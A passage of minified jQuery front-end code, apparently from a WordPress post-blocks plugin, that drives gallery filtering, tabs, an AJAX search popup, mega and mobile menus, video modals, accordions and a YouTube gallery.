o=t(this),n=o.data("tag")||"";"All"===e||n.includes(e)?(l++,s<i?(o.css({display:"block"}),s++):o.css({display:"none"})):o.css({display:"none"})})),o.toggle(0===l),{visibleCount:s,totalMatch:l}}function w(t){s.fadeIn(150),setTimeout((()=>{t(),s.fadeOut(150)}),400)}if(n.on("click",(function(){const e=t(this),i=e.text();e.siblings().removeClass("active-gallery-filter"),e.addClass("active-gallery-filter"),f=h,w((()=>{const{visibleCount:t,totalMatch:e}=b(i,f);a.css({display:t<e?"block":"none"}),g(),v()}))})),a.on("click",(function(e){e.preventDefault();const s=i.find(".active-gallery-filter").text()||"All";let l=0,n=0;u.each((function(){const e=t(this),i=e.data("tag")||"";("All"===s||i.includes(s))&&(n++,e.is(":visible")&&l++)}));const r=l%c;let d=0!==r?c-r:c;f=Math.min(l+d,n),w((()=>{let e=0;u.each((function(){const i=t(this),o=i.data("tag")||"";"All"===s||o.includes(s)?(i.css({display:e<f?"block":"none"}),e++):i.css({display:"none"})})),f>=n&&a.css({display:"none"}),o.toggle(0===n),g(),v()}))})),r.length){const k=Number(getComputedStyle(l[0]).getPropertyValue("--ultp-gallery-height").trim())||300;function x(t){const e=t[0];return(e.naturalWidth||e.width||1)/(e.naturalHeight||e.height||1)}m=function(e){const i=r,s=i.width()||i.closest(".ultp-tab-content").width();let o=0;const l=[];let n=[],a=0;e.each((function(){const e=t(this),i=x(e.find("img"));n.push({$item:e,ratio:i}),a+=i,n.length===c&&(l.push({cells:n,ratioSum:a}),n=[],a=0)})),n.length&&l.push({cells:n,ratioSum:a}),l.forEach((t=>{const e=p*(t.cells.length-1),i=s-e;let l=0;t.cells.forEach((({$item:e,ratio:s},n)=>{const a=i*(s/t.ratioSum);e.css({position:"absolute",top:o,left:l,width:a,height:k}),l+=a+p})),o+=k+p})),i.height(o-p)}}setTimeout((()=>{const t=i.find(".ultp-gallery-filter__item.active-gallery-filter").text()||"All",{visibleCount:e,totalMatch:l}=b(t,f);a.css({display:e<l?"block":"none"}),o.toggle(0===l),g(),v(),s.fadeOut(50)}),500)}0==t("body.postx-admin-page").length&&e&&t(window).on("load resize",(function(){t(".wp-block-ultimate-post-gallery").each((function(){i(t(this))}))}))}(jQuery),function(t){function e(){const e=t=>t.closest(".wp-block-ultimate-post-tabs");t(".wp-block-ultimate-post-tabs").each((function(){let i=t(this);const s=i.data("responsive"),o=i.find(".ultp-tabs-nav").first(),l=i.find(".ultp-tab-content").first().children(".wp-block-ultimate-post-tab-item"),n=i.children().children(".ultp-nav-right").length>0||i.children().children(".ultp-nav-left").length>0;i.parent(".wp-block-ultimate-post-tab-item").length>0&&i.closest(".ultp-tab-content").css({overflow:"hidden"}),"slider"==s&&i.width()<600&&i.find(".ultp-tabs-nav").css({flexWrap:"nowrap"}),i.width()<600&&"accordion"==i.data("responsive")&&!i.hasClass(".ultp-tab-accordion-active")&&(i.addClass("ultp-tab-accordion-active"),i.find(".ultp-tabs-nav-element").each((function(e){t(this).data("order")&&t(this).css({order:2*(e+1)-1})})),l.each((function(e){t(this).css({order:2*(e+1)})}))),i.hasClass("ultp-tab-accordion-active")&&(o.css("display","contents").parent().css("display","contents"),l.addClass("ultp-tab-content").parent().css("display","contents")),l.each((function(i){e(t(this)).data("activetab")==t(this).data("tabindex")&&t(this).addClass("active")}));const a=i.find(".ultp-tabs-nav-wrapper"),r=i.find(".ultp-tab-left-arrow").first(),d=i.find(".ultp-tab-right-arrow").first(),c="autoplay"==i.data("tabevent")?"click":i.data("tabevent");let p="slider"==s||i.find(".ultp-tab-wrapper").hasClass("ultp-nav-left")||i.find(".ultp-tab-wrapper").hasClass("ultp-nav-right"),u=n?o.height():o.width(),h=u/o?.children().length,f=n?a.height():a.width(),m=0,g=h;function v(){0==m&&d.addClass("ultp-arrow-active"),d.off("click").on("click",(function(e){e.stopPropagation();const i=n?t(this).closest(".ultp-tabs-nav-wrapper").height():t(this).closest(".ultp-tabs-nav-wrapper").width(),s=n?t(this).siblings().find(".ultp-tabs-nav").height():t(this).siblings().find(".ultp-tabs-nav").width(),o=s-i,l=s/t(this).siblings().find(".ultp-tabs-nav")?.children().length;o>m&&o-m>l&&(m+=l),o-m<l+1&&(m+=o-m,t(this).removeClass("ultp-arrow-active")),m>0&&t(this).siblings(".ultp-tab-left-arrow").addClass("ultp-arrow-active");let a=n?`translate(0px, -${m}px)`:`translate(-${m}px, 0px)`;t(this).siblings().find(".ultp-tabs-nav").css({transform:a})})),r.off("click").on("click",(function(e){const i=(n?t(this).siblings().find(".ultp-tabs-nav").height():t(this).siblings().find(".ultp-tabs-nav").width())/t(this).siblings().find(".ultp-tabs-nav")?.children().length;m>i?m-=i:m=0,m>0?t(this).siblings(".ultp-tab-right-arrow").addClass("ultp-arrow-active"):t(this).removeClass("ultp-arrow-active");let s=n?`translate(0px, -${m}px)`:`translate(-${m}px, 0px)`;t(this).siblings().find(".ultp-tabs-nav").css({transform:s})}))}function b(e,i,o){if(!(e.parent(".wp-block-ultimate-post-tab-item").length>0)||e.parent(".wp-block-ultimate-post-tab-item").hasClass("active")){u=n?o.height():o.width(),h=u/o?.children().length,f=n?a.height():a.width();const e=o.find(".ultp-tabs-nav-element");if(g+=h,k*h<f&&(o.css({transform:"translate(0px, 0px)"}),"slider"==s&&(d.addClass("ultp-arrow-active"),r.removeClass("ultp-arrow-active"))),k*h>f){p&&(r.addClass("ultp-arrow-active"),d.addClass("ultp-arrow-active"));let t=n?`translate(0px, ${f-k*h}px)`:`translate(${f-k*h}px, 0px)`;o.css({transform:t})}const l=e.parent().children().length;e.each((function(e){w&&t(this).removeClass("tab-progressbar-active"),e+1==k?(t(this).addClass("ultp-tab-active"),w&&t(this).addClass("tab-progressbar-active")):t(this).removeClass("ultp-tab-active")})),i.each((function(e){t(this).each((function(){e+1==k?t(this).addClass("active"):t(this).removeClass("active")}))})),l==k&&(d.removeClass("ultp-arrow-active"),k=0),k++}}t(".ultp-tabs-nav-element").off(c).on(c,(function(i){i.stopPropagation;const s=t(this);s.addClass("ultp-tab-active").siblings().removeClass("ultp-tab-active"),e(t(this)).find(".wp-block-ultimate-post-tab-item").each((function(){t(this).removeClass("active"),t(this).data("tabindex")==s.data("tabindex")&&t(this).addClass("active")})),u=n?o.height():o.width(),h=u/o?.children().length,f=n?a.height():a.width(),u>f&&p&&v()})),u>f&&p&&v();const w=i.data("progressbar"),y=1e3*t(this).data("duration");let k=e(t(this)).data("activetab")-1||1;if("autoplay"==t(this).data("tabevent")){let t=setInterval((()=>b(i,l,o)),y);i.on("mouseleave",(function(){t=setInterval((()=>b(i,l,o)),y)})),i.on("mouseenter",(function(){clearInterval(t)}))}}))}e(),t(window).on("resize",(function(){e()}))}(jQuery),function(t){t(".wp-block-ultimate-post-advanced-search")?.length&&function(){let e=1;t(document).on("click",".ultp-search-clear",(function(){e=1;const i=t(this).data("blockid");t(this).parents(".ultp-search-inputwrap").find(".ultp-searchres-input").val(""),t(this).removeClass("active"),t(`.ultp-block-${i}`).find(".ultp-result-data").html(""),t(`.ultp-block-${i}`).find(".ultp-search-noresult, .ultp-viewall-results, .ultp-result-loader").removeClass("active")})),t(document).on("click",".ultp-popupclose-icon",(function(){t(this).parents(".result-data").removeClass("popup-active")})),t(document).on("click",".ultp-searchpopup-icon",(function(){const e=t(this).parents(".ultp-search-frontend"),i=e.data("blockid");s(e,!t(`.result-data.ultp-block-${i}`).length),t(`.result-data.ultp-block-${i}`).toggleClass("popup-active")})),t(".ultp-searchres-input").val().length>2&&t(".ultp-searchres-input").closest(".ultp-search-inputwrap").find(".ultp-search-clear").addClass("active");t(document).on("input",".ultp-searchres-input",(function(e){i(t(this),e.target.value)}));const i=(i,o,l="",n=!0)=>{l=l||i.parents(".ultp-search-inputwrap").find(".ultp-search-clear").data("blockid");const a=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${l}`).find(".ultp-search-frontend"),r=t(`.result-data.ultp-block-${l}`);s(a,!r.length),o.length>2?a.data("ajax")&&(r.find(".ultp-search-result").addClass("ultp-search-show"),r.find(".ultp-result-loader").addClass("active"),r.addClass("popup-active"),wp.apiFetch({path:"/ultp/ultp_search_data",method:"POST",data:{searchText:o,date:parseInt(a.data("date")),image:parseInt(a.data("image")),author:parseInt(a.data("author")),excerpt:parseInt(a.data("excerpt")),category:parseInt(a.data("catenable")),excerptLimit:parseInt(a.data("excerptlimit")),postPerPage:a.data("allresult")?a.data("postno"):10,exclude:"string"!=typeof a.data("searchposttype")&&a.data("searchposttype").length>0&&a.data("searchposttype"),paged:e,wpnonce:ultp_data_frontend.security}}).then((e=>{if(e.post_data){n?(r.find(".ultp-search-result").addClass("ultp-search-show"),r.find(".ultp-result-data").addClass("ultp-result-show"),r.find(".ultp-result-data").html(e.post_data)):(r.find(".ultp-search-result").addClass("ultp-search-show"),r.find(".ultp-result-data").addClass("ultp-result-show"),r.find(".ultp-result-data").append(e.post_data).fadeIn(500,(function(){t(this).animate({scrollTop:t(this).prop("scrollHeight")},400)}))),r.find(".ultp-search-noresult, .ultp-result-loader").removeClass("active");const i=r.find(".ultp-result-data .ultp-search-result__item").length;r.find(".ultp-viewall-results").addClass("active").find("span").text(`(${e.post_count-i})`)}else r.find(".ultp-result-data").removeClass("ultp-result-show"),r.find(".ultp-result-data").html(""),r.find(".ultp-search-noresult").addClass("active"),r.find(".ultp-result-loader, .ultp-viewall-results").removeClass("active");if(a.data("allresult")){const t=r.find(".ultp-result-data .ultp-search-result__item").length;e.post_count&&e.post_count>t?r.find(".ultp-viewall-results").addClass("active").find("span").text(`(${e.post_count-t})`):r.find(".ultp-viewall-results").removeClass("active")}}))):(r.find(".ultp-search-result").removeClass("ultp-search-show"),r.find(".ultp-result-data").removeClass("ultp-result-show"),r.find(".ultp-search-noresult").removeClass("active")),o.length<3?(e=1,r.find(".ultp-result-data").html(""),r.find(".ultp-viewall-results").removeClass("active"),r.find(".ultp-search-noresult").removeClass("active"),a.find(".ultp-search-clear").removeClass("active"),t(`.result-data.ultp-block-${l}`).find(".ultp-search-clear").removeClass("active")):(a.find(".ultp-search-clear").addClass("active"),t(`.result-data.ultp-block-${l}`).find(".ultp-search-clear").addClass("active"))};t(document).on("click",".ultp-viewall-results",(function(s){e++;const o=t(this).closest(".result-data").data("blockid");i(t(this),t(`.ultp-block-${o} .ultp-searchres-input`).val(),o,!1)})),t(".wp-block-ultimate-post-advanced-search").length>0&&t(document).on("click",(function(e){t(e.target).closest(".ultp-searchpopup-icon").length||t(e.target).closest(".ultp-searchres-input").length||t(e.target).closest(".result-data.popup-active").length||t(".result-data").removeClass("popup-active"),t(e.target).closest(".ultp-search-frontend").length||t(e.target).closest(".result-data.popup-active").length||t(".result-data").removeClass("popup-active")}));t(document).on("keyup",".ultp-searchres-input",(function(e){const i=t(this).closest(".ultp-search-inputwrap").find(".ultp-search-clear").data("blockid"),s=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend").data("gosearch");let o="_self";if(t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend").data("enablenewtab")&&(o="_blank"),s&&"Enter"==e.key&&t(this).val().length>2){const e=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend");let s="string"!=typeof e.data("searchposttype")&&e.data("searchposttype")?.length>0&&e?.data("searchposttype");s=s.length?`&ultp_exclude=${JSON.stringify(s.map((t=>t.value)))}`:"",window.open(`${ultp_data_frontend.home_url}/?s=${t(this).val()}${s}`,o)}})),t(document).on("click",".ultp-search-button",(function(e){const i=t(this).closest(".ultp-searchform-content").find(".ultp-search-clear").data("blockid"),s=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend").data("gosearch");let o="_self";if(t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend").data("enablenewtab")&&(o="_blank"),s){const e=t(`.wp-block-ultimate-post-advanced-search.ultp-block-${i}`).find(".ultp-search-frontend");let s="string"!=typeof e.data("searchposttype")&&e.data("searchposttype")?.length>0&&e?.data("searchposttype");s=s.length?`&ultp_exclude=${JSON.stringify(s.map((t=>t.value)))}`:"",window.open(`${ultp_data_frontend.home_url}/?s=${t(this).closest(".ultp-searchform-content").find(".ultp-searchres-input").val()}${s}`,o)}else t(`.result-data.ultp-block-${i}`).addClass("popup-active")})),t(document).on("click",".ultp-searchres-input",(function(e){const i=t(this).closest(".ultp-searchform-content").find(".ultp-search-clear").data("blockid");t(".result-data").removeClass("popup-active"),t(`.result-data.ultp-block-${i}`).addClass("popup-active")})),t(window).on("resize",(function(){t(".ultp-search-result").length>0&&t(".ultp-search-frontend").each((function(e){s(t(e))}))}));const s=(e,i=!1)=>{const s=e.data("blockid"),o=e.data("popuptype"),l=e.data("popupposition");if(i){const i=e.data("allresult"),n=`<div class="ultp-search-result" data-image=${e.data("image")||!1} data-author=${e.data("author")||!1} data-date=${e.data("date")||!1} data-excerpt=${e.data("excerpt")||!1} data-excerptlimit=${e.data("excerptlimit")} data-allresult=${i||!1} data-catenable=${e.data("catenable")||!1} data-postno=${e.data("postno")||!1} data-gosearch=${e.data("gosearch")||!1} data-popupposition=${l||!1}>\n                    <div class="ultp-result-data"></div>\n                    <div class="ultp-search-result__item ultp-search-noresult">${e.data("noresultext")}</div>\n                    <div class="ultp-search-result__item ultp-result-loader"></div>\n                    ${i?`<div class="ultp-viewall-results ultp-search-result__item">${e.data("viewmoretext")}<span></span></div><div class="ultp-search-result__item ultp-viewmore-loader"></div>`:""}\n                    </div>`;if(o){const i=t(`.ultp-block-${s}`).find(".ultp-search-canvas").detach();t("body").append(`<div class="result-data ultp-block-${s} ultp-search-animation-${o}" data-blockid=${s}><div class="ultp-search-canvas">${i.html()+(e.data("ajax")?n:"")}</div></div>`)}else t("body").append(`<div class="result-data ultp-block-${s}" data-blockid=${s}>${n}</div>`)}let n="";if(!o){n=e.find(".ultp-searchform-content");const i=n.offset();return t(`body > .ultp-block-${s}`).css({width:`${n.width()}px`,top:`${i?.top+n.height()}px`,left:`${i?.left}px`})}if("popup"==o){n=e.find(".ultp-searchpopup-icon");const i=n.offset(),o="right"==l?i?.left>t(`body > .ultp-block-${s}`).width():t(document).width()-i?.left>t(`body > .ultp-block-${s}`).width();let a="",r="";return"right"==l?(a=o?t(document).width()-i?.left-n.outerWidth()+"px":"unset",r=o?"auto":i?.left+("right"==l?10:0)+"px"):(a=o?"unset":t(document).width()-i?.left-n.outerWidth()+"px",r=o?i?.left+("right"==l?10:0)+"px":"auto"),t(`body > .ultp-block-${s}`).css({top:`${i?.top+n.outerHeight()}px`,right:a,left:r})}}}()}(jQuery),function(t){function e(e){if(t(".editor-styles-wrapper")?.length)return;const i=t(".wp-block-ultimate-post-menu-item.hasMegaMenuChild > .ultp-menu-item-wrapper > .ultp-menu-item-content");i.length>0&&i.each((function(){if(t(this).hasClass("ultpMegaWindowWidth")){const e=t("body")?.width()||1200,i=t("body")?.offset()?.left||0;t(this)?.offset();t(this).find(" > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper").css({maxWidth:`${e}px`,boxSizing:"border-box"});const s=t(this).siblings(".ultp-menu-item-label-container")?.offset()?.left||0;t(this).css({left:i-s+"px"})}else if(t(this).hasClass("ultpMegaMenuWidth")){const e=t(this).closest(".wp-block-ultimate-post-menu")?.width()||800,i=t(this).closest(".wp-block-ultimate-post-menu")?.offset()?.left||0,s=t(this)?.offset()?.left||0;t(this).find(" > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper").css({maxWidth:`${e}px`,boxSizing:"border-box"}),t(this).css({left:i-s+"px"});const o=t(this).siblings(".ultp-menu-item-label-container")?.offset()?.left||0;t(this).css({left:i-o+"px"})}else t(this).find(" > .wp-block-ultimate-post-mega-menu > .ultp-mega-menu-wrapper").css({maxWidth:"",boxSizing:""}),t(this).css({left:""})}))}setTimeout((()=>{e("setTimeout")}),10),e("normal");const i=0==t("body.postx-admin-page").length;i&&t(window).on("resize",(function(){e()}));let s,o,l,n,a,r,d,c,p,u="",h=[],f=[];function m(e,i=""){if("close"==i)t(l).find("> .ultp-mobile-view-container > .ultp-mobile-view-wrapper").css({transform:"translateX(-100%)",visibility:"hidden",opacity:"0"}),setTimeout((()=>{t(l).hasClass("ultpMenu__Css")&&(t(l).addClass("ultpMenuCss"),t(l).removeClass("ultpMenu__Css")),t(l).removeClass("ultp-mobile-menu"),t(l).find("> .ultp-mobile-view-container").removeClass("ultp-mv-active"),t(l).find("> .ultp-mobile-view-container > .ultp-mobile-view-wrapper").css({transform:"",visibility:"",opacity:"","transition-property":"","transition-timing-function":"","transition-duration":""}),s?.html(""),u="",h=[],s="",o="",l="",n="",a="",c=0,p="",f=[]}),c);else{const i=t(e.target);c=t(i).hasClass("ultp-mv-ham-icon")?t(i).data("animationduration"):i.closest(".ultp-mv-ham-icon").data("animationduration"),c=c||100,p=t(i).hasClass("ultp-mv-ham-icon")?t(i).data("headtext"):i.closest(".ultp-mv-ham-icon").data("headtext"),r=i.closest(".wp-block-ultimate-post-menu").find("> .ultp-mobile-view-container > .ultp-mv-icons > .ultp-mv-label-icon svg").prop("outerHTML"),d=i.closest(".wp-block-ultimate-post-menu").find("> .ultp-mobile-view-container > .ultp-mv-icons > .ultp-mv-label-icon-expand svg").prop("outerHTML"),l=i.closest(".wp-block-ultimate-post-menu");const s=t(l);t(l).hasClass("ultpMenuCss")&&(t(l).removeClass("ultpMenuCss"),t(l).addClass("ultpMenu__Css")),u="ultp-block-"+s.data("bid"),s.addClass("ultp-mobile-menu"),s.find("> .ultp-mobile-view-container").addClass("ultp-mv-active"),v("","hamIcon"),s.find("> .ultp-mobile-view-container > .ultp-mobile-view-wrapper").css({"transition-property":"opacity, visibility, transform","transition-timing-function":"ease-in","transition-duration":c?c/1e3+"s":".25s"})}}function g(t){const e=t?._replace||r;let i=t?._string;return i&&f.length&&f.forEach((t=>{t&&e&&(i=i.replace(t,e))})),i}function v(e,i){if("hamIcon"==i){n=l.data("rcsstype"),a=l.data("rstr"),s=t(l).find("> .ultp-mobile-view-container .ultp-mobile-view-body"),o=t(l).find("> .ultp-mobile-view-container .ultp-mv-back-label");let e=t(l).find("> .ultp-menu-wrapper > .ultp-menu-content").html();if(t(l).find(".ultp-menu-item-dropdown").toArray().forEach((e=>{t(e).html()&&f.push(t(e).html())})),e){let i=t("<div>").html(e);i.find(".wp-block-ultimate-post-menu").addClass("ultp-mobile-menu"),e=i.html(),e=g({type:"hamicon",_string:e}),s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e),o.html(p)}}else if("next"==i){const i=t(e.target).closest(".wp-block-ultimate-post-menu-item"),r=i.data("bid");if(!h.includes("ultp-block-"+r)){let e="",d="";if(i.hasClass("hasListMenuChild")?(d=i.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-list-menu").css("display"),e=i.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-list-menu > .ultp-list-menu-wrapper > .ultp-list-menu-content").html()):(d=i.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-mega-menu").css("display"),e=i.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").html()),"none"==d)return;if(e){t(l).find(".ultp-mv-back-label-con").removeClass("ultpmenu-dnone");let d=t("<div>").html(e);d.find(".wp-block-ultimate-post-menu").addClass("ultp-mobile-menu"),e=d.html(),h.push(u),u="ultp-block-"+r,o.html(i.find("> .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-label-text").html()),"mv_dissolve"==a?s.find("> *").animate({opacity:.2},c,(function(){s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e),s.find("> *").css("opacity",".1"),s.find("> *").animate({opacity:1},c)})):(s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e),s.find("> *").css({opacity:".1",transform:"translateX(100%)",transition:`transform ${c/1e3+"s"} ease`}),s.find("> *").animate({opacity:.3},10,(function(){s.find("> *").css({opacity:"1",transform:"translateX(0px)"})})))}}}else if("back"==i){if(0==h.length)return;u=h.pop()||"";let e="";if(0==h.length?(e=t(l).find("> .ultp-menu-wrapper > .ultp-menu-content").html(),o.html(p),t(l).find(".ultp-mv-back-label-con").addClass("ultpmenu-dnone")):t("."+u).hasClass("wp-block-ultimate-post-menu-item")&&(e=t("."+u).hasClass("hasListMenuChild")?t(l).find("."+u).find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-list-menu > .ultp-list-menu-wrapper > .ultp-list-menu-content").html():t(l).find("."+u).find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").html()),e){let i=t("<div>").html(e);i.find(".wp-block-ultimate-post-menu").addClass("ultp-mobile-menu"),e=i.html(),e=g({type:"back",_string:e}),o.html(t(l).find("."+u).find("> .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-label-text").html()),"mv_dissolve"==a?(s.find("> *").animate({opacity:.2},c,(function(){s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e)})),s.find("> *").animate({opacity:1},c)):(s.html("custom"==n?e.replaceAll("ultpMenuCss","ultpMenu__Css"):e),s.find("> *").css({opacity:".1",transform:"translateX(-100%)",transition:`transform ${c/1e3+"s"} ease`}),s.find("> *").animate({opacity:.3},10,(function(){s.find("> *").css({opacity:"1",transform:"translateX(0px)"})})))}}}function b(e,i){const s=t(e.target).closest(".wp-block-ultimate-post-menu-item");let o,l,n="next";if(s.hasClass("ultp-menu-res-css")?n="back":s.addClass("ultp-menu-res-css"),"next"==n){s.addClass("ultp-hammenu-accordian-active"),d&&s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-label-container .ultp-menu-item-dropdown").html(d),o=s.hasClass("hasListMenuChild")?s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content > .wp-block-ultimate-post-list-menu > .ultp-list-menu-wrapper > .ultp-list-menu-content"):s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content"),o.length||(o=s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content")),l=o.outerHeight();const e=s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content"),i=e.css("padding-top"),n=e.css("padding-bottom");s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").html(o.html()),s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").css({height:"0px","padding-top":"0","padding-bottom":"0"}),s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").animate({height:l+"px","padding-top":i,"padding-bottom":n},c,(function(){t(this).css({height:"","padding-top":"","padding-bottom":""})}))}else"back"==n&&(s.removeClass("ultp-hammenu-accordian-active"),s.find(".wp-block-ultimate-post-menu-item").removeClass("ultp-hammenu-accordian-active"),s.find("> .ultp-menu-item-wrapper > .ultp-menu-item-content").animate({height:"0",paddingTop:"0",paddingBottom:"0"},c,(function(){t(this).css({height:"",paddingTop:"",paddingBottom:""}),r&&s.find(".ultp-menu-item-wrapper .ultp-menu-item-label-container .ultp-menu-item-dropdown").each((function(){t(this).html()&&t(this).html(r)})),s.removeClass("ultp-menu-res-css"),s.find(".wp-block-ultimate-post-menu-item").removeClass("ultp-menu-res-css")})))}i&&(t(".wp-block-ultimate-post-menu").each((function(){const e=t(this);"hasRootMenu"!=e.data("hasrootmenu")&&e.find(`.ultp-menu-item-wrapper[data-parentbid=".ultp-block-${e?.data("bid")}"] > .ultp-menu-item-label-container a`).each((function(){const i=t(this),s=window.location.href;let o=!1;const l=i[0].href;if(s.endsWith("/")&&!l.endsWith("/")){const t=l+"/";s.replace("https:","http:")==t.replace("https:","http:")&&(o=!0)}(s.replace("https:","http:")==l.replace("https:","http:")||o)&&i.closest(`.ultp-menu-item-wrapper[data-parentbid=".ultp-block-${e?.data("bid")}"]`).addClass("ultp-current-link")}))})),t(document).on("click",'.wp-block-ultimate-post-menu[data-mv="enable"] > .ultp-mv-ham-icon.ultp-active',(function(t){m(t,"ham")})),t(document).on("click",".ultp-mobile-view-container .ultp-mv-back, .ultp-mobile-view-container .ultp-mv-back-label-con",(function(t){"mv_dissolve"==a||"mv_slide"==a?v(t,"back"):b(t,"back")})),t(document).on("click",".ultp-mobile-view-container .ultp-mv-close",(function(t){m(t,"close")})),t(document).on("click",".ultp-mobile-view-container",(function(e){t(e.target).hasClass("ultp-mobile-view-container")&&m(e,"close")})),t(document).on("click",".ultp-mobile-view-container .ultp-menu-item-label-container",(function(e){t(e.target).is(".ultp-menu-item-label")||t(e.target).parent().is(".ultp-menu-item-label")||t(e.target).is(".ultp-menu-item-label-container")&&0==t(e.target).siblings(".ultp-menu-item-content").find("> *").length||(e.preventDefault(),"mv_dissolve"==a||"mv_slide"==a?v(e,"next"):b(e,"next"))})))}(jQuery),function(t){function e(){if(t(".ultp-video-modal.modal_active").length>0){let e=t(".ultp-video-modal.modal_active").find("iframe");if(e.length){const t=e.attr("src");if(t){let i="";i=t.includes("dailymotion.com/player")?t.replaceAll("&?autoplay=1","?autoplay=0"):t.replaceAll("&autoplay=1",""),i&&e.attr("src",i)}}else t(".ultp-video-modal.modal_active").find("video").trigger("pause");t(".ultp-video-modal").removeClass("modal_active")}}t(document).on("click",".ultp-video-icon",(function(){const e=t(this),i=e.parents(".ultp-block-item"),s=e.closest(".ultp-block-image"),o=s.find("div.ultp-block-video-content");let l=i.find(".ultp-video-icon").attr("enableAutoPlay"),n=i.find(".ultp-video-icon").attr("enableVideoPopup"),a=i.find("iframe");const r=o.find("iframe").length>0,d=o.find("video").length>0;if(n||!r&&!d||(s.find("> a img").hide(),o.css({display:"block"}),e.hide(),(r||d)&&(a=o.find("iframe").length>0?o.find("iframe"):o.find("video"),d&&l&&o.find("video").trigger("play"))),a.length){i.find(".ultp-video-modal").addClass("modal_active");const e=a.attr("src");e&&l&&(e.includes("dailymotion.com/player")?a.attr("src",e.includes("?autoplay=0")?e.replace("?autoplay=0","&?autoplay=1"):`${e}?autoplay=1`):a.attr("src",`${e}&autoplay=1`)),a.on("load",(function(){t(".ultp-loader-container").hide()}))}else i.find(".ultp-video-modal").addClass("modal_active"),t(".ultp-video-modal.modal_active").find("video").trigger("play")})),t(document).on("click",".ultp-video-close",(function(){e()})),t(document).on("keyup",(function(t){"Escape"==t.key&&e()}))}(jQuery),function(t){0==t("body.postx-admin-page").length&&t(".wp-block-ultimate-post-accordion").length>0&&t(".wp-block-ultimate-post-accordion").each((function(){const e=t(this).data("active"),i=t(this).data("autocollapse");t(this).children().children(".wp-block-ultimate-post-accordion-item").each((function(s){const o=t(this);s==e?(t(this).addClass("active active-accordion"),o.find(".ultp-accordion-item__content").first().css({display:"block"})):t(this).removeClass("active active-accordion"),t(this).children(".ultp-accordion-item").children(".ultp-accordion-item__navigation").on("click",(function(){const e=t(this).parent().parent(".wp-block-ultimate-post-accordion-item"),s=e.find(".ultp-accordion-item__content").first(),o=e.parent().parent(".wp-block-ultimate-post-accordion");s.is(":visible")?s.stop(!0,!0).slideUp(300,(function(){e.removeClass("active active-accordion")})):(i&&o.find(".ultp-accordion-item__content:visible").first().stop(!0,!0).slideUp(300,(function(){e.siblings().removeClass("active active-accordion"),e.addClass("active active-accordion")})),e.addClass("active active-accordion"),s.stop(!0,!0).slideDown(300))}))}))}))}(jQuery),function(t){t(document).ready((function(){!function(){function e(t,e){if("string"==typeof t)try{return JSON.parse(t)}catch(t){return e}return"object"==typeof t&&null!==t?t:e}function i(e,i){if(!e)return"";const s=t(window).width();let o;return o=s<600?i.sm||i.lg:s<900&&i.md||i.lg,e.length>o?e.substring(0,o)+"...":e}function s(t,e){const i=[...t];switch(e){case"title":return i.sort(((t,e)=>t.title.localeCompare(e.title,void 0,{sensitivity:"base"})));case"latest":return i.sort(((t,e)=>new Date(e.publishedAt).getTime()-new Date(t.publishedAt).getTime()));case"date":return i.sort(((t,e)=>new Date(t.publishedAt).getTime()-new Date(e.publishedAt).getTime()));case"popular":return i.sort(((t,e)=>(e.viewCount||0)-(t.viewCount||0)));default:return t}}function o(t){if(!t)return"";try{const e=new URL(t);if("www.youtube.com"===e.hostname){if(e.pathname.startsWith("/channel/"))return e.pathname.split("/channel/")[1];if(e.pathname.startsWith("/@"))return e.pathname.substring(2);if(e.searchParams.get("list"))return e.searchParams.get("list")}return t}catch(e){return t}}function l(e,i,s){t.get(`https://www.googleapis.com/youtube/v3/search?part=snippet&q=${encodeURIComponent(e)}&type=channel&key=${i}`).done((function(t){t.items&&t.items.length>0?s(t.items[0].snippet.channelId):s(null)})).fail((function(){s(null)}))}function n(t,e){return`\n\t\t\t\t<div class="ultp-ytg-video-wrapper">\n\t\t\t\t\t<iframe \n\t\t\t\t\t\tsrc="https://www.youtube.com/embed/${t}?${["autoplay="+(e.autoplay?"1":"0"),"loop="+(e.loop?"1":"0"),"mute="+(e.mute?"1":"0"),"controls="+(e.showPlayerControl?"1":"0"),"modestbranding="+(e.hideYoutubeLogo?"1":"0"),e.loop?`playlist=${t}`:null].filter(Boolean).join("&")}"\n\t\t\t\t\t\ttitle="YouTube Video"\n\t\t\t\t\t\tframeborder="0"\n\t\t\t\t\t\tallow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"\n\t\t\t\t\t\tallowfullscreen\n\t\t\t\t\t></iframe>\n\t\t\t\t</div>\n\t\t\t`}function a(t,e,s,o,l,n,a){let r='<div class="ultp-ytg-content">';return t&&(r+=`<div class="ultp-ytg-title"><a href="https://www.youtube.com/watch?v=${a}" target="_blank" rel="noopener noreferrer">${i(e,s)}</a></div>`),o&&(r+=`<div 